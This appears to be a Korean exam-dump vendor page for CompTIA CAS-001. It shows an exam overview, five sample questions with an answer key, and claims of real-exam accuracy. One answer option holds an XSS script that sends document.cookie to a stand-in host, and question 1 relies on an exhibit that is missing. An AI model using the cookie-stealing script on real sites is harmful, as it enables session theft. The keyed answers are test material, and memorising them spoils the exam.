CompTIA CAS-001 시험 개요:
| 인증 벤더: | CompTIA |
|---|---|
| 시험명: | CompTIA Advanced Security Practitioner |
| 시험 번호: | CAS-001 |
| 시험 형식: | 객관식, 실무형 문항 |
| 자격증 유효 기간: | 3년 (CompTIA Continuing Education 프로그램 적용) |
| 시험 시간: | 165분 |
| 지원 언어: | 영어 |
| 합격 점수: | 합격/불합격 (CompTIA는 CAS-001에 대한 점수화된 합격 기준을 공개적으로 밝히지 않았습니다) |
| 관련 자격증: | CompTIA Advanced Security Practitioner (CASP) |
| 응시료: | USD 426 (이전 권장소비자가격으로, 국가 및 시기에 따라 다를 수 있음) |
| 실제 시험 문항 수: | 최대 80문항 |
| 샘플 문제: | CompTIA CAS-001 샘플 문제 |
| 응시 방법: | 공인 Pearson VUE 시험 센터를 통해 제공되는 컴퓨터 기반 시험 (이전에는 제공되는 경우 공인 온라인 감독 시험을 통해서도 응시 가능했습니다). |
| 전제 조건: | 공식적인 선수 조건은 없습니다. CompTIA는 최소 5년의 실무 기술 보안 경력을 포함하여 약 10년의 IT 관리 경력을 권장합니다. |
| 공식 요강 URL: | https://www.comptia.org/en/certifications/securityx/ |
CompTIA CAS-001 시험 요강 주제:
| 섹션 | 비중 | 목표 |
|---|---|---|
| 주제 1: 기업 보안 | 30% | - 기업 보안 아키텍처
|
| 주제 2: 연구 및 분석 | 20% | - 보안 분석
|
| 주제 3: 컴퓨팅, 통신 및 비즈니스 분야의 통합 | 30% | - 보안 솔루션 통합
|
| 주제 4: 리스크 관리, 정책 및 법률 | 20% | - 리스크 관리
|
최신 CompTIA Advanced Security Practitioner CAS-001 무료샘플문제
문제 #1
-- Exhibit -
-- Exhibit -
Company management has indicated that instant messengers (IM) add to employee productivity. Management would like to implement an IM solution, but does not have a budget for the project.The security engineer creates a feature matrix to help decide the most secure product. Click on the Exhibit button.
Which of the following would the security engineer MOST likely recommend based on the table?
A. Product A
B. Product D
C. Product C
D. Product B
문제 #2
An architect has been engaged to write the security viewpoint of a new initiative. Which of the following BEST describes a repeatable process that can be used for establishing the security architecture?
A. Classify information types used within the system into levels of confidentiality, integrity, and availability. Determine minimum required security controls. Conduct a risk analysis. Decide on which security controls to implement.
B. Inspect a previous architectural document. Based on the historical decisions made, consult the architectural control and pattern library within the organization and select the controls that appear to best fit this new architectural need.
C. Perform a risk analysis of the system. Avoid extreme risks. Mitigate high risks. Transfer medium risks and accept low risks. Perform continuous monitoring to ensure that the system remains at an adequate security posture.
D. Implement controls based on the system needs. Perform a risk analysis of the system. For any remaining risks, perform continuous monitoring.
문제 #3
A security engineer at a bank has detected a Zeus variant, which relies on covert communication channels to receive new instructions and updates from the malware developers. As a result, NIPS and AV systems did not detect the configuration files received by staff in emails that appeared as normal files. Which of the following BEST describes the technique used by the malware developers?
A. Stenography
B. Perfect forward secrecy
C. Transport encryption
D. Diffusion
E. Confusion
문제 #4
A company contracts with a third party to develop a new web application to process credit cards. Which of the following assessments will give the company the GREATEST level of assurance for the web application?
A. Code Review
B. Social Engineering
C. Penetration Test
D. Vulnerability Assessment
문제 #5
Which of the following displays an example of a buffer overflow attack?
A. #include
char *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes
void main()
{char buf[8];
strcpy(buf, code);
}
B. <SCRIPT>
document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie
</SCRIPT>
C. <form action="/cgi-bin/login" method=post>
Username: <input type=text name=username>
PassworD.<input type=password name=password>
<input type=submit value=Login>
D. Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-
1.dsc
e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz
d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz
ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb
7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb
b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb
질문과 대답:
| 문제 #1 정답: C | 문제 #2 정답: A | 문제 #3 정답: A | 문제 #4 정답: A | 문제 #5 정답: A |














986 개 고객 리뷰
품질과 가치ITCertKR 의 높은 정확도를 보장하는 최고품질의 덤프는 IT인증시험에 대비하여 제작된것으로서 높은 적중율을 자랑하고 있습니다.
테스트 및 승인ITCertKR 의 덤프는 모두 엘리트한 전문가들이 실제시험문제를 분석하여 답을 작성한 만큼 시험문제의 적중률은 아주 높습니다.
쉽게 시험패스ITCertKR의 테스트 엔진을 사용하여 시험을 준비한다는것은 첫 번째 시도에서 인증시험 패스성공을 의미합니다.
주문하기전 체험ITCertKR의 각 제품은 무료 데모를 제공합니다. 구입하기로 결정하기 전에 덤프샘플문제로 덤프품질과 실용성을 검증할수 있습니다.
